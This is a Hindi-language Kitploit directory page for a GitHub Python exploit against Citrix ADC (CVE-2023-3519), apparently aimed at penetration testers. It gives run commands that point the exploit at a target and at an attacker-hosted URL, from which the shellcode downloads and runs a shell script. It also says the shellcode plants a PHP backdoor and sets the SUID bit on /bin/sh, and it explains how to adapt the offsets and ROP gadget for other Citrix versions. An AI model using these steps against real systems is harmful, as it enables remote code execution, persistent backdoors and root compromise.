Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-3519 — CVE-2023-3519 के लिए Python एक्सप्लॉइट जो कस्टम NASM शेलकोड, PHP बैकडोर तैनाती, और SUID विशेषाधिकार वृद्धि के साथ Citrix ADC को लक्षित करता है। | Kitploit
उपकरण/GitHubGitHub/passwa11/cve-2023-3519
भेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubpasswa11/cve-2023-3519

CVE-2023-3519

CVE-2023-3519 के लिए Python एक्सप्लॉइट जो कस्टम NASM शेलकोड, PHP बैकडोर तैनाती, और SUID विशेषाधिकार वृद्धि के साथ Citrix ADC को लक्षित करता है।

रिपॉजिटरी देखें
1123 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Citrix ADC RCE CVE-2023-3519

यह एक्सप्लॉइट Citrix VPX 13.1-48.47 के लिए एड्रेस और शेलकोड का उपयोग करता है। पूर्ण लेख के लिए, यहाँ क्लिक करें।

उपयोग

शेलकोड बनाने के लिए NASM आवश्यक है।

root@kitploit:~
$ sudo apt install nasm

शामिल शेलकोड रिमोट http(s) सर्वर से एक शेल स्क्रिप्ट डाउनलोड और चलाएगा। स्क्रिप्ट 3 तर्क लेता है: लक्ष्य होस्ट, लक्ष्य पोर्ट, और शेल स्क्रिप्ट पेलोड का URL। एक उदाहरण पेलोड जो स्वयं को साफ करने से पहले id और uname -a चलाता है, इस रिपॉजिटरी में शामिल है।

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

URL इतना छोटा होना चाहिए कि शेलकोड बफर में फिट हो जाए, और यदि यह बहुत लंबा है तो आपको एक चेतावनी मिलेगी।

शेलकोड आर्टिफैक्ट्स

शेलकोड /var/netscaler/logon/a.php में एक PHP बैकडोर बनाएगा और पर SUID बिट सेट करेगा। शामिल पेलोड इन आर्टिफैक्ट्स को स्वचालित रूप से साफ करने का एक उदाहरण दिखाता है। यह भी ध्यान दें कि शेलकोड अपने फ़ाइल डिस्क्रिप्टर को बंद नहीं करता है, इसलिए अत्यधिक बार-बार शोषण के परिणामस्वरूप संसाधन समाप्ति हो सकती है।

/bin/sh
sh

अन्य संस्करणों में अनुकूलन

FreeBSD-आधारित Citrix लक्ष्यों के लिए, आपको केवल 3 मान खोजने की आवश्यकता है: सहेजे गए रिटर्न पॉइंटर का ऑफसेट, एक jmp rsp ROP गैजेट (या इसके समतुल्य, जैसे push rsp; ret;), और क्रैश से बचने के लिए कूदने का पता। ये पैरामीटर सभी cve-2023-3519.py के शीर्ष के पास हार्डकोडेड हैं।

टूल डाउनलोड करें